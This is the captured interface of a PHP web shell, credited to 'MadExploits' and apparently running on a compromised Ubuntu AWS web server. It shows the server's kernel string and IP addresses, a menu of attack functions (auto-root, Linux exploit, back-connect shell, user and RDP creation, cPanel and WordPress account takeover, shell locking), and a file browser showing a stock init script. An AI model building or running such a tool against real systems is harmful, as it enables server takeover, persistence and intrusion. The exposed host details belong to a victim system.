Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.128.153.31
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
core /
17200 /
etc /
rc6.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01cgmanager
3.48
KB
-rwxr-xr-x
K01cgproxy
3.28
KB
-rwxr-xr-x
K01resolvconf
4.05
KB
-rwxr-xr-x
K01ubuntu-fan
1.2
KB
-rwxr-xr-x
K01urandom
3.04
KB
-rwxr-xr-x
K02sendsigs
3.83
KB
-rwxr-xr-x
K03rsyslog
2.73
KB
-rwxr-xr-x
K04hwclock.sh
3.72
KB
-rwxr-xr-x
K04umountnfs.sh
2.15
KB
-rwxr-xr-x
K05networking
4.66
KB
-rwxr-xr-x
K06umountfs
2.67
KB
-rwxr-xr-x
K07umountroot
1.83
KB
-rwxr-xr-x
K08reboot
661
B
-rwxr-xr-x
README
351
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K08reboot
#! /bin/sh ### BEGIN INIT INFO # Provides: reboot # Required-Start: # Required-Stop: # Default-Start: # Default-Stop: 6 # Short-Description: Execute the reboot command. # Description: ### END INIT INFO PATH=/sbin:/usr/sbin:/bin:/usr/bin . /lib/lsb/init-functions do_stop () { # Message should end with a newline since kFreeBSD may # print more stuff (see #323749) log_action_msg "Will now restart" reboot -d -f -i } case "$1" in start) # No-op ;; restart|reload|force-reload) echo "Error: argument '$1' not supported" >&2 exit 3 ;; stop) do_stop ;; status) exit 0 ;; *) echo "Usage: $0 start|stop" >&2 exit 3 ;; esac
Close